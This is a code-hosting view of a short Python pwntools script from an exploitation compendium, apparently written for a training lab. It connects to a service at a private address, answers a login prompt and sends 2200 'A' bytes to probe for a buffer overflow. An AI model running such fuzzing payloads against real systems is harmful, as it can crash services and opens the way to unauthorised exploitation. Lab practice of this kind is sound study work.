killchain-compendium/Exploits/Binaries/Scripts/pwn_fuzz.py

9 lines
147 B
Python

import pwn
r = pwn.remote("10.10.156.228", 9999)
r.recvuntil(":")
r.send("User\r\n")
r.recvuntil(":")
r.send(b'A' * 2200)
r.recvuntil("message:")